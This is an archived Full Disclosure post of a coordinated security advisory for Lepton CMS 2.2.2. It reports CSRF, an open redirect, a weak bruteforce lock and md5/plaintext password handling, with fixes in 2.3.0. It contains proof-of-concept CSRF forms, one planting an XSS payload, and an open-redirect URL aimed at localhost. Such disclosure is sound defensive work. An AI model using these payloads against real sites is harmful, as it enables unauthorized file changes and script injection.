[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0MBO0z-1bx6DL4AwH-00AEsu@mrelayeu.kundenserver.de>
Date: Thu, 17 Nov 2016 10:59:42 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Lepton 2.2.2: CSRF, Open Redirect,
Insecure Bruteforce Protection & Password Handling
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version http://www.lepton-cms.org/posts/
Link: important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection &
Type: Password Handling
Remote Yes
Exploitable:
Reported to 09/05/2016
vendor:
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is
vulnerable to Open Redirect, the in-build bruteforce protection can be easily
bypassed, and passwords are hashed with md5 and send out via email in
plaintext.
3. Details
CSRF
CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P
Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.
Proof of Concept:
Delete Folder: <html> <body> <form action="http://localhost//
LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?
action=delete_folder" method="POST"> <input type="hidden" name="path" value=
"test>" /> <input type="hidden" name="name" value="" /> <input type="submit"
value="Submit request" /> </form> </body> </html> Create File: <html> <body>
<form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/
tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type
="hidden" name="path" value="" /> <input type="hidden" name="name" value=
"test.html" /> <input type="hidden" name="new_content" value="<img src=no
onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </
body> </html>
Open Redirect
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP
Description: The redirect parameter of the logout script is vulnerable to open
redirect.
Proof of Concept:
http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://
google.com
Insufficient Bruteforce Protection
Description: The bruteforce protection works on a per-session base, which is
easily bypassed by an attacker by simply requesting a new session by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.
Code:
if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }
Password Handling
The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.
Additionally, md5 is used for hashing, which is also not recommended.
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists